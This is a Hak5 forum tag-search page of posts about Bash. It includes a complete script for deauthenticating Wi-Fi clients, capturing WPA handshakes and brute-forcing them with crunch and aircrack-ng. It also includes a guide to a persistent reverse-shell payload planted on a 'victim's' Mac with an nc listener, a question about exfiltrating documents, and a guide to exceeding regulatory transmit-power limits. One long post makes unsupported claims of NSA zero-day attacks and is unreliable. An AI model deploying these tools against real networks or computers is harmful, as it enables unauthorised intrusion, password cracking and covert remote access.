Jump to content

Search the Community

Showing results for tags 'Bash'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. This my first (more than 5 line) bash script. If you have any suggestions/tips for improvment, I'm all ears. Its designed to run on kali, but should be easily portable to other pentesting distros (or it might work right out of the box, idk i havent tested with anything else). What it does: 1. Starts a moniter mode on the interface of your choosing. 2. Spoofs you MAC if you so desire. 3. Runs airodump-ng. 4. Prompts user for a BSSID/channel. 5. Creates a ~/Handshakes folder in your home directory. 6. Dumps the user specified network traffic to the created ~/Handshakes folder. 7. While dumping traffic opens an xterm window that deauthenticates the previously specified AP. 8. Asks the user if they would like to start again from step 3. 9. Shuts down mon0, changes back to perment mac (if they want). 10. Gives the user the a number of options for attacking the handshake with aircrack-ng, these include: a) Running the preincluded rockyou.txt in kali (automaticlly decompresses). b) A number of bruteforce attacks. (7 predefined options) c) Allows the user to pass there own arguments to crunch. RAW code: #!/bin/bash clear echo "" #Configuration: HANDSHAKE='/root/Handshakes/HandShake*.cap' WORDLIST='/usr/share/wordlists/rockyou.txt' MONITER=mon0 #End configuration echo "***************************************" echo "***********AIRCRACKED V-2.0************" echo "***************************************" echo "** **" echo "** Wrtten by @thisguysayswht **" echo "** Email: hofmanjosh555@yahoo.com **" echo "** **" echo "** Usage: **" echo "** **" echo "** Starts moniter interface **" echo "** Spoofs MAC adderss **" echo "** Runs airodump-ng **" echo "** Creates Handshake directory **" echo "** Dumps specified network traffic **" echo "** Deauthenticates specified AP **" echo "** Captures handshake **" echo "** Restores wireless interfaces **" echo "** Runs aircrack-ng **" echo "** **" echo "***************************************" echo "***************************************" echo "" echo "" echo "========Press enter to continue========" read START if [[ $START == "" ]]; then sleep 2 clear fi #Use at your own risk... echo "---------------------------------------------------" echo "-Would you like to start a moniter interface[y/n]?-" echo "---------------------------------------------------" echo "" read MONIF if [[ $MONIF == 'y' ]]; then echo "" iwconfig echo "Please select a wireless interface from above" echo "" read WIRELESS [[ $WIRELESS == "" ]] sleep 2 clear echo "Starting interface on $WIRELESS..." sleep 2 airmon-ng start $WIRELESS sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi echo "----------------------------------------" echo "-Would you like to spoof your MAC[y/n]?-" echo "----------------------------------------" echo "" read MACSPF if [[ $MACSPF == 'y' ]]; then echo "" echo "Shutting down all wireless interfaces..." echo "" sleep 2 ifconfig $WIRELESS down ifconfig $MONITER down echo "Changing to random MAC..." echo "" sleep 2 macchanger -r $WIRELESS macchanger -r $MONITER echo "" echo "Bringing spoffed interfaces up..." echo "" sleep 4 clear ifconfig $WIRELESS up ifconfig $MONITER up else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "--------------------------------------------------" echo "-Would you like to dump the network traffic[y/n]?-" echo "--------------------------------------------------" echo "" read DUMP if [[ $DUMP == 'y' ]]; then echo "" echo "Dumping network traffic...[Ctrl-C to stop]" sleep 4 airodump-ng $MONITER else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------" echo "-Would you like to capture a handshake[y/n]?-" echo "---------------------------------------------" echo "" read HANDC if [[ $HANDC == 'y' ]]; then echo "" echo "Creating directory Handshakes..." echo "" sleep 2 cd ~ mkdir Handshakes &> /dev/null echo "" echo "Please enter the network BSSID:" echo "" read BSSID [[ $BSSID == "" ]] echo "" echo "Please enter the network channel:" echo "" read CHNEL [[ $CHNEL == "" ]] airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER & sleep 6 && xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" && exec -c clear else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------------" echo "-Would you like to capture another handshake[y/n]?-" echo "---------------------------------------------------" echo "" read AGAIN if [[ $AGAIN == "n" ]]; then break echo "" echo "Skipping..." sleep 2 clear fi done clear echo "-----------------------------------------------------------------------" echo "-Would you like to restore your previous interface configuration[y/n]?-" echo "-----------------------------------------------------------------------" echo "" read RESTOR if [[ $RESTOR == "y" ]]; then echo "" echo "Disabling moniter mode..." sleep 2 airmon-ng stop $MONITER echo "Shutting down main wireless interface..." echo "" sleep 2 ifconfig $WIRELESS down echo "Restoring perment MAC..." echo "" sleep 2 macchanger -p $WIRELESS echo "" echo "Bringing main wireless interface back up..." echo "" sleep 2 ifconfig $WIRELESS up echo "Wireless interfaces restored" echo "" sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "*****************************************************" echo "*******************Select option*********************" echo "*****************************************************" echo "** **" echo "** 1. View handshakes (Ctrl-C to exit) **" echo "** 2. Use rockyou.txt (4 hours) **" echo "** 3. Bruteforce 8 numeric (1 day 6 hrs) **" echo "** 4. Bruteforce 9 numeric (12 days) **" echo "** 5. Bruteforce 10 numeric (4 months) **" echo "** 6. Bruteforce 8 a-z (7 years) **" echo "** 7. Bruteforce 8 A-Z (7 years) **" echo "** 8. Bruteforce 8 a-z + numeric (91 years) **" echo "** 9. Bruteforce 8 A-Z + numeric (91 years) **" echo "** 10. Bruteforce 8 a-z + A-Z (1719 years) **" echo "** 11. Bruteforce custom (???) **" echo "** **" echo "*****************************************************" echo "**********All calculations done @1000 pmk/s**********" echo "*****************************************************" echo "" read n case $n in 1)(xterm -hold -e aircrack-ng $HANDSHAKE) & ;; 2)clear echo "Decompressing rockyou.txt..." gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null echo "" sleep 2 echo "Starting attack..." sleep 3 aircrack-ng -w $WORDLIST $HANDSHAKE echo "" read -p "Press any key to return to script";; 3)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 numeric" echo "" crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 4)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 9 numeric" echo "" crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 5)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 10 numeric" echo "" crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 6)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 7)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 8)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 9)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z numeric" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 10)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z A-Z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 11)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "What arguments would you like to pass to crunch?" echo "" read CRUNCH [[ $CRUNCH == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; *)clear echo "Invalid option" echo "" read -p "Press any key to return to script";; esac sleep 1 done Executable: Apparetly it wont let me upload "this kind of file", if anyone has a workaround let me know. For now just copy/paste into a text editor, save, and chmod -x /the/file in a terminal (or right click >permissions>allow executing of this file) Disclaimer: This code was written for educational purposes only. I am not responsible for what you do with this code. If this code sets your computer on fire, I am not responsible. If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible. This code is designed to test the security of your router, and not anyone else's. If this code gets you laid, I might take responsibility. If you use this code, you are agreeing that it is at your own risk.
  2. Can someone guide me to become a Ethical Hacker. I am just new to this and I know little bit of python and Java. I have always been interested in this field and I am looking forward for a career in it.
  3. Hello, Just asking you guys, is BB worth it in 2020? I mean is all of it detected by AV and does it run? Also how long the Bunny works, does it turn into DedBunny easily? Or does it have long life?
  4. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Single Blink) Installing connect.sh script Amber (Double Blink) Creating cron job White (Fast Blink) Cleaning up Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from MacPersistentReverseShell to either switch folder Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337 ?) Save the connect.sh file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat) If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh) Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) Once a bash shell prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download.
  5. Can you make videos on automation in non-rooted android smartphone remotely?? We know, we can write a bash/shell script and send it to someone remotely via link, if he/she clicks on link, the script will automatically execute. Can we do same in non-rooted android smartphone too?? For an instance, can we send a link to someone with a non-rooted android smartphone , if he/she clicks on link, automatically his/her email account will open, automatically a message will be written in email and it will be sent automatically. Is it possible?? I think it is same as rubber ducky
  6. Hallo!! This is my payload, just a python smb server thats points to the switch folder. PROBLEM: it creates the share, but i cant access the files, because the /root/udisk is not mounted. If i boot the bunny in RNDIS, goto the console and do "udisk mount" i can access the files, but I cant mount udisk from inside a payload Any ideas? Is there anything I'm missing. Thx, and keep on developing!! :) #!/bin/bash LED SETUP GET SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot LED STAGE1 ATTACKMODE RNDIS_ETHERNET udisk mount python /tools/impacket/examples/smbserver.py e $SWITCHDIR & LED FINISH
  7. What are some good statements for getting GPU information. Pretty much I just need the make of the GPU so I can install drivers. Here's some of the ideas I came up with. As you can see they are not really catch all statements. I need just a bit of help. Any ideas would be great. ISINTEL="Intel" IsINTEL=$(lspci | grep -EA2 'VGA|3D' | grep '00:0' | cut -d ' ' -f 5) if [ "$IsINTEL" == "$ISINTEL" ]; then echo -e "Intel" fi ISNVIDIA="NVIDIA" IsNVIDIA=$(lspci | grep -EA2 'VGA|3D' | grep '00:0' | cut -d ' ' -f 4) if [ "$IsNVIDIA" == "$ISNVIDIA" ]; then echo -e "NVIDIA" fi ISAMD="Advanced" IsAMD=$(lspci | grep -EA2 'VGA|3D' | grep '00:0' | cut -d ' ' -f 5) if [ "$IsAMD" == "$ISAMD" ]; then echo -e "AMD" fi On a personal note, my BASH skills are getting a lot better.
  8. Hello Guys! I've just received my Bash Bunny and need some Help. I've updated it already and want to use the Document Exfiltration. Can someone explain it step by step, what I've to do? I want to exfiltrate PDFs and .docx from a computer and/or from a USB stick plugged in a computer. Is this possible? Please HELP
  9. Original link is here (with more pertinent details that I won't post in this thread): https://github.com/corna/me_cleaner/issues/51 My name is Carlos Royal and I've witnessed several zero day exploits used against my computer. As a result of this, I've been the target of government corruption AND an extended gaslighting campaign that's designed to undermine the fact that the government got caught red handed breaking into my pc (when I was using an end-of-life system that had no management engine) by means of both attempting to erode my sanity/make me question my memory and attempting to pull me out of integrity (so I hand my power away/do something criminal-esque due to provocation and end up in prison/lose liberties or rights... to undermine the fact that the NSA got caught red handed). This post, which spans an experience of at least three years, is meant to combat the governments method/tactic of gaslighting (to escape accountability/acknowledgement of misusing government capabilities), by means of making my experience a public record (since the techniques/tactics employed rely on me staying silent due to doubt, fear, and "what if's"), and is highly beneficial to any security professional that reads it. (to the organization that targeted me: Consider the above paragraph "Game Over.") Mandatory backstory: A while ago, I decided to challenge myself by attempting to obtain the Offensive Security Certified Professional certification in an effort to break into the penetration testing field. Over the course of 120 days, I managed to successfully breach and escalate on 16 systems within the OSCP lab. Firefox Zero Day: During my progress, I noticed unusual activity on my computer. I make heavy use of the Linux terminal on an everyday basis and I noticed that the shell that I was using wasn’t the first shell that was open. Upon further investigation, I noticed two bash processes running on my PC. Upon closing the one that I wasn’t using, my Firefox browser closed at the exact same instant. This leads me to believe that I was targeted by the FoxAcid system due to my activity from the OSCP labs and that the zero day exploit didn't use the proper escape sequence. Tor Malicious Node Zero Day: I utilized an Open-WRT router as the base of my build. From behind it, I built an Arch Linux “transparent TOR router” that was designed to fail-close (where if my PC could not connect to the internet through TOR, it wouldn’t be able to connect to the internet whatsoever). From behind this router, I rebuilt my new PC using the Arch Linux distro. A few weeks later, after my build was complete, in use, and thoroughly tested, I observed on the “check.torproject.org” page (which was a page that I would check compulsively) that I “wasn’t using TOR.” (THE MANAGEMENT ENGINE EXISTED WITHIN THE PC BUILD THAT I USED WHEN THIS EXPLOIT WAS USED AGAINST ME. THE GOVERNMENT UNMASKED ME OVER TOR SO I WOULD CATCH THE IP ADDRESS OF THE TOR NODE ON PURPOSE.) This would lead me to believe that the government is in possession of a risky zero day exploit that exists to target TOR only users. Instead of targeting the TOR network directly, it would seem that this exploit works at the modem level and intercepts and possibly redirects the user to a malicious TOR node that’s not on the TOR network. NOTE: If you "attempt to browse" the check.torproject.org page and it attempts to resolve for an extended period of time when using TOR, you should probably reset your circuit. You're probably being unmasked and your connection to the check.torproject.org page is most likely being dropped. DBUS Daemon Socket Exploit/X11 Socket Exploit: The "bash" and "sh" Linux binaries aren't the only things that the government can target. They are also capable of targeting other things, such as the DBUS-DAEMON socket or the X11 socket on a Linux PC, to create a secondary session for the purpose of viewing, and perhaps interacting, with the target's PC. Things that can be done include, but are not limited to: spawning extra lock screens, crashing GUI tied processes (such as security scripts running in konsole), crashing the GUI in general, viewing your keystrokes and monitors, etc. A home user's browser is one of the primary avenues of attack and can be targeted by state actors to spawn shell binaries (or any binary) or use exploits against the DBUS-DAEMON socket or X11 socket. NOTE: This can be rectified with pre-existing open source software, such as firejail (read the man page, USE THE AUDIT FEATURE. It will TELL YOU WHAT TO FIX.): firejail --rmenv=DBUS_SESSION_BUS_ADDRESS --private=/root/a/fake/home/directory/ --x11=xephyr --quiet --net=ethernet1 openbox Alternative to openbox, adding "nolisten local" to the X11 options of the X server running on a users system will disable abstract sockets (which should be sufficient in combination with a private tmp directory and private network spaces to use the PC's gui instead of nesting it). If you're cosmologically "lucky," you may be able to see firejail kick back an error when the "sandboxed application" attempts to access a blacklisted file/folder that it's not supposed to. If you're concerned about sandbox escapes (which do exist), this can be combated with the "kill" command listed below, as well as with good old fashioned socket monitoring (such as running "ss," with extra parameters, in a loop to tie processes to IP addresses). I've also found that renaming "dbus-launch" and "dbus-send" to "dbus-launch.old" and "dbus-send.old" as well as qdbus to qdbus.old serves to stifle the sandbox escapes that aren't covered by the shell kill script. These sandbox escapes aren't AS DETRIMENTAL as having shell access/control over the users PC, but can still be used for seriously nefarious purposes. Theory: The 3 letter agencies connect to a users pc through google IP addresses. Zombie Tracking Cookies: Firefox connects to the internet when opened, regardless of whether or not the user chooses to browse. Upon attempting to disable third party cookies, I noticed that there was a tracking cookie that was implanted in my browser despite the fact that I did no browsing. Previously, the only third party tracking cookie that I've witnessed was one belonging to "google." I theorize that the NSA's zombie cookies implant themselves when the user opens up their browser (which connects to the internet) and disguises itself as the site that the user visits first. Because I did no surfing whatsoever, the tracking cookie was disguised as a Mozilla tracking cookie. The Mozilla home page does not require third party tracking cookies. This exploit was spotted originally due to my use of an addon that self-destructs unused cookies after 1 minute. Before I found this cookie undisguised, I noticed that a "google" tracking cookie would continue to self-destruct every minute, despite me closing and re-opening the browser and not navigating to google. Catching it in it undisguised state some time later confirmed my suspicions that this was a zombie tracking cookie (which was most likely set to attempt to re-implant itself automatically whenever I opened my browser). How Corna's Intel ME removal script no shit saved my skin: Because of the nature of the incidents that I've witnessed, I've designed a script that utilizes the killall command that will kill all processes specified that are older than 5 seconds. killall "sh" -q -v -y 5s This command, when run in a loop every two seconds, kills all shells ("bash" and "sh" specifically) that are younger than 5 seconds. So long as a terminal process that THE USER CONTROLS is already running, the user gains the ability to use their own terminals while denying access to terminals that are opened as a result of any exploits that are used against their computer. The terminal is THE HEART of pentesting, and in denying this resource to an attacker, it denies an attacker the ability to gain control over a users PC. The idea is to open a few terminal processes before running this command in a loop in a script (AS ROOT AND AS A BACKGROUND PROCESS, since a terminal manager's process can be "crashed"), and then connecting to the internet as normal. Your operating system is capable of defending itself (for free) with native tools. This technique can be used for more than just stopping shells. It can also be used for sandbox escapes that occur through firejail. Common binaries that the 3 letters can target are "bash," "sh," "dbus-daemon," and "qdbus (kde)." The last two can be spawned as processes and attached to firefox, similar to escaped shells. The kill command will work to stop the end result of Firefox forking to binaries on your system that it shouldn't fork to. This can be tested ON YOUR OWN WITH A KNOWN VULNERABLE VM. I actually ENCOURAGE anyone and EVERYONE to try this for themselves (I want to be proven wrong). What's important to note here is that THIS IS USELESS WITHOUT THE INTEL MANAGEMENT ENGINE REMOVED FROM YOUR COMPUTER. No software solution will ever be a good enough solution so long as hardware backdoors/secondary operating systems exist within a users system. The Intel management engine contains an Operating system that shares physical resources with the target machine. Without Corna's removal efforts, I would be up the creek with no paddle. To obtain a better stance on PC security, open source security solutions must be used IN COMBINATION WITH CORNA'S REMOVAL SCRIPT/the removal of the Intel Management Engine. Both hardware and software security solutions must be used together. I leave my post here for the security experts to judge for themselves (all attempts to take the appropriate channels to close the leaks, have failed spectacularly). Critique this logic, spin up a vulnerable VM, and TEST IT FOR YOURSELF. I'd love for someone to prove me wrong.
  10. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage). *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu : https://github.com/hiruna/wifi-txpower-unlocker Working directory: /root Steps: 1. Update and upgrade apt-get update apt-get upgrade 2. Install dependencies to compile apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential 3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz 4. Unzip the downloaded files tar xvJf crda-3.18.tar.xz tar xvJf wireless-regdb-2017.03.07.tar.xz 5. Navigate into wireless-regdb-2017.03.07 cd wireless-regdb-2017.03.07 6. Open db.txt and locate the region BO section nano db.txt You will see something like this: country BO: DFS-JP (2402 - 2482 @ 40), (30) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file: country BO: DFS-JP (2402 - 2482 @ 40), (33) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO: country AU: DFS-ETSI (2400 - 2483.5 @ 40), (36) (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS (5470 - 5600 @ 80), (27), DFS (5650 - 5730 @ 80), (27), DFS (5730 - 5850 @ 80), (36) (57000 - 66000 @ 2160), (43), NO-OUTDOOR However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm: country AU: DFS-ETSI (2402 - 2482 @ 40), (N/A, 20), (N/A) (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS (5735 - 5835 @ 80), (N/A, 30), (N/A) So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed. 7. Compile make 8. Backup up your old regulatory.bin file and move the new file into /lib/crda mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old mv regulatory.bin /lib/crda As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys: sforshee.key.pub.pem linville.key.pub.pem 9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer: cp root.key.pub.pem ../crda-3.18/pubkeys/ cp sforshee.key.pub.pem ../crda-3.18/pubkeys/ I found that there are two other pubkeys located at /lib/crda : -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem So I copied them too (wasn't too sure whether I needed to copy them): cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/ cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/ 10. Navigate into crda-3.18 and open the Makefile cd ../crda-3.18 nano Makefile In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin : REG_BIN?=/lib/crda/regulatory.bin 11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors): CFLAGS += -std=gnu99 -Wall -pedantic 12. Compile make clean make make install That's it! I rebooted my Raspberry Pi after compiling. reboot 13. Now let's change the region and set the txpower to 33dBm: ifconfig wlan1 down iw reg set BO iwconfig wlan1 txpower 33 ifconfig wlan1 up
  11. I really loved the last two episodes on creating a VPN. I have a Wifi Pineapple Nano and have setup a VPN server and can manually connect . I used the forwarding 'foo' code in the video to get client forwarding working. Now I wanted to make it so that the openvpn client and the forwarding script works on startup but I cannot seem to get it working. I've done some searching but cannot think of where to go from here. I've put this in /etc/init.d/ #!/bin/sh # Start the openvpn service openvpn client.ovpn #Setup forwarding for clients iptables -t nat -A POSTROUTING -s -o tun0 -j MASQUERADE iptables -A FORWARD -s -o tun0 -j ACCEPT iptables -A FORWARD -d -m state --state ESTABLISHED,RELATED -i tun0 -j ACCEPT And created a symlink to /etc/rc.d/ If I run the commands separately it all works however I cannot get it to run on boot. Should they be run as two different processes? Is it because openvpn is running the second won't trigger. Not sure if it's my lack of understanding of Unix/bash scripting or something else. Thanks for your time guys.
  12. I'm trying to run the script below to get the drive letter of the Bash Bunny then change directories to it but i keep having issues with the apostrophes and dollar signs # test LED B ATTACKMODE HID STORAGE LED Y 300 RUN WIN powershell.exe DELAY 100 QUACK STRING "$USBDrive = Get-WmiObject Win32_Volume -Filter "DriveType='2'"|select -expand driveletter" QUACK ENTER DELAY 50 QUACK STRING "cd $USBDrive/payloads/switch1" QUACK ENTER i added quotation marks before and after the commands i wanted to execute because usually that runs anything through QUACK containing an apostrophe without error but then when i plug the usb in these are the commands that are output Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Users\Elijah> = Get-WmiObject Win32_Volume -Filter DriveType=2|select -expand driveletter = : The term '=' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:2 + = Get-WmiObject Win32_Volume -Filter DriveType=2|select -expand driv ... + ~ + CategoryInfo : ObjectNotFound: (=:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException PS C:\Users\Elijah> cd /payloads/switch1 cd : Cannot find path 'C:\payloads\switch1' because it does not exist. At line:1 char:1 + cd /payloads/switch1 + ~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\payloads\switch1:String) [Set-Location], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand PS C:\Users\Elijah> Im not too advanced in Powershell, Bash, or even Ducky so there's probably some simple fix
  13. Capsos

    No Loot

    Happy New Year All Been checking the updates with the auto updater and new payloads. Ive ran a few on a older laptop i use for training encase i Fook it up..... Well ive tried a few of them now and all the RGB flash to the correct sequence. I have tried it with the Laptop in locked and unlocked and neither time when i check i have a empty loot folder !! Any ideas ? I have tried disabling my Security protection just in case but still nothing ! Thanks in advance
  14. Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement
  15. Hi, I was looking on making a purchase with devices including the Rubber Ducky but I was also interested to buying the Bash Bunny as well but I've also read on a Reddit forum that it's better to have the Ducky and Turtle together than the Bunny alone. My question is which one should I pair with the Ducky? The Bunny or Turtle? What can they offer me that the other can't? Thanks
  16. I have been troubleshooting issues with the bashbunny for as long as it has been available. I got mine as soon as it was released; and it has been nothing but problematic from day one; which is a shame. The device, in theory, is probably the best thing Hak5 has ever come out with; but it practice, it has been the least usable in my experience. Many payloads will not run consistently; if they run properly at all. Every payload that makes use of the USB partition (the one thing that should really allow us to accomplish truly amazing feats) is problematic for many of its customers. The bashbunny forum is littered with threads full of people who cannot get any credential payloads to work because USB writing fails; among other problems. Simple ducky payloads that execute fine on the ducky or on nethunter's duckhunter will not inject properly a fair percentage of the time on the bashbunny. I see mixed character case issues where they shouldn't be and other anomalies. I am really hoping the USB corruption issues and the bizarre injection problems I am having is due solely to the fact that I adopted so early and the rest of the devices are not plagued with these issues; as they make the device unusable. I am pleading with Hak5 support here to please provide me with a replacement. I and my friends have poured countless hours of time and ulcers into trying to get this device to work; with, very little and, no lasting success. Anything we get to to work once or twice is quickly broken by yet another USB corruption issue or other strange injection anomaly. Please help me. I have gone through every unbricking, reflashing, updating, and udisk reformatting operation that support has given and have tried every firmware available. Nothing seems to be able to salvage this bunny. Help me technolust-ken-obee. You're my only hope...
  17. I am trying to create a script which uploads a file to a computer, I want the script called "payload.txt" to check if the file has been uploaded to the directory specified on the computer.
  18. deck_bsd


    Hi everybody, I just flashed my bash bunny to the new 1.3 version of the firmware. I would like to test the QuickCreds payload on my windows 10 Enterprise. It seems to be stuck in yellow mode (LED ATTACK) forever. Responder is correctly installed into the tools folder. In loot/QuickCreds i have a good folder name but nothing into it. I m doing something wrong ? i have noticed some few thins like, in the payload , it is using the -P option but responder.py doesn 't have it, i erased it, but nothing change. Any ideas ? The thing is, before i just change the LED color , when i tried QuickCreds, after the setup light it was directly the blinking green ligh (i didn't get the yellow one, that's why i would like to test it). After i modified those LED instruction (juste the LED i promes) , the payload always stay in yellow mode. Thanks in advance for your support :-)
